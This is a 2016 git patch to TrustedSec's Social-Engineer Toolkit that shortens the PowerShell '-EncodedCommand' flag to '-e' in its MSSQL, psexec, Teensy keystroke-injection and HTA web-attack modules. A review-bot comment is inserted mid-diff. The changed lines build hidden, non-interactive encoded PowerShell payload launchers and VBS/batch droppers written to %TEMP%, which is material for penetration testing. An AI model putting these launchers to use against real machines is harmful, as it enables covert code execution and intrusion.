From 0ff64fcae02f4168ad45ae64b374e3f5f97beab2 Mon Sep 17 00:00:00 2001
From: TrustedSec
Date: Thu, 13 Oct 2016 23:13:53 -0400
Subject: [PATCH] convert encodedcommand to -e abbreviated
---
readme/CHANGELOG | 6 ++++++
src/fasttrack/mssql.py | 2 +-
src/fasttrack/psexec.py | 2 +-
src/powershell/powershell.py | 2 +-
src/teensy/binary2teensy.py | 2 +-
src/teensy/sd2teensy.py | 2 +-
src/webattack/hta/main.py | 2 +-
7 files changed, 12 insertions(+), 6 deletions(-)
diff --git a/readme/CHANGELOG b/readme/CHANGELOG
index 3a7364571..fe2a0fe63 100644
--- a/readme/CHANGELOG
+++ b/readme/CHANGELOG
@@ -1,3 +1,9 @@
+~~~~~~~~~~~~~~~~
+version 7.4.1
+~~~~~~~~~~~~~~~~
+
+* converted all powershell encodedcommand to abbreviated
+
 ~~~~~~~~~~~~~~~~
 version 7.4
 ~~~~~~~~~~~~~~~~
diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py
index 0e441130c..ea92aefe7 100644
--- a/src/fasttrack/mssql.py
+++ b/src/fasttrack/mssql.py
@@ -262,7 +262,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
 x86 = file(core.setdir + "x86.powershell").read().rstrip()
 # x86 = x86.read()
- x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
+ x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
 core.print_status("If you want the powershell commands and attack, "
 "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
 filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py
index 2e72fa1c6..fcdf97323 100644
--- a/src/fasttrack/psexec.py
+++ b/src/fasttrack/psexec.py
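Review bot: The launch prefix `powershell -nop -window hidden -noni -e {0}` is now hand-edited as a separate string literal in this hunk, in the psexec.py and powershell.py hunks, in the two Teensy sketch templates and in the HTA builder, and none of the new lines records why the short option spelling was chosen, so the next option change is another six-file commit. Hoist the prefix into one shared constant (the `core` module that the fasttrack and powershell hunks already reference looks like the natural home, though its layout is outside this diff) and carry the rationale on that one definition, e.g. `# "-e" is the abbreviated spelling of -EncodedCommand; the teensy/hta templates must stay in sync`. The HTA variant `powershell -window hidden -e` omits `-nop -noni` relative to the other five call sites; a single constant would either make that difference deliberate and visible or remove it. deploy_hex2binary continues outside the hunk, as do the enclosing blocks of the psexec.py and powershell.py hunks.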
@@ -86,7 +86,7 @@ try:
 #with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
 # x86 = fileopen.read()
 x86 = open(core.setdir + "x86.powershell", "r").read()
- x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
+ x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
 core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
 filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
 filewrite.write(x86)
diff --git a/src/powershell/powershell.py b/src/powershell/powershell.py
index a93d97c5a..13933ddcf 100644
--- a/src/powershell/powershell.py
+++ b/src/powershell/powershell.py
@@ -57,7 +57,7 @@ if powershell_menu_choice != "99":
 # here we format everything for us
 with open(core.setdir + "/x86.powershell") as fileopen:
 x86 = fileopen.read()
- x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
+ x86 = "powershell -nop -window hidden -noni -e " + x86
 core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
 with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
 filewrite.write(x86)
diff --git a/src/teensy/binary2teensy.py b/src/teensy/binary2teensy.py
index d532c067b..71a1562a7 100644
--- a/src/teensy/binary2teensy.py
+++ b/src/teensy/binary2teensy.py
@@ -373,7 +373,7 @@ void loop()
 // run through cmd
 CommandAtRunBar("cmd");
 delay(1000);
- Keyboard.println("powershell -EncodedCommand {powershell_command}");
+ Keyboard.println("powershell -e {powershell_command}");
 delay(4000);
 Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
 Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");
diff --git a/src/teensy/sd2teensy.py b/src/teensy/sd2teensy.py
index 5260e28c6..2529081e4 100644
--- a/src/teensy/sd2teensy.py
+++ b/src/teensy/sd2teensy.py
@@ -174,7 +174,7 @@ void setup()
 // run through cmd
 CommandAtRunBar("cmd");
 delay(1000);
- Keyboard.println("powershell -EncodedCommand {powershell_command}");
+ Keyboard.println("powershell -e {powershell_command}");
 // Tweak this delay. Larger files take longer to decode through powershell.
 delay(10000);
 Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
diff --git a/src/webattack/hta/main.py b/src/webattack/hta/main.py
index 42ab89129..fef21d30e 100644
--- a/src/webattack/hta/main.py
+++ b/src/webattack/hta/main.py
@@ -33,7 +33,7 @@ def gen_hta_cool_stuff():
 "Generating powershell injection code and x86 downgrade attack...")
 ps = generate_powershell_alphanumeric_payload(
 selection, ipaddr, port, "x86")
- command = ("powershell -window hidden -EncodedCommand " + ps)
+ command = ("powershell -window hidden -e " + ps)
 # hta code here
 print_status("Embedding HTA attack vector and PowerShell injection...")
 # grab cloned website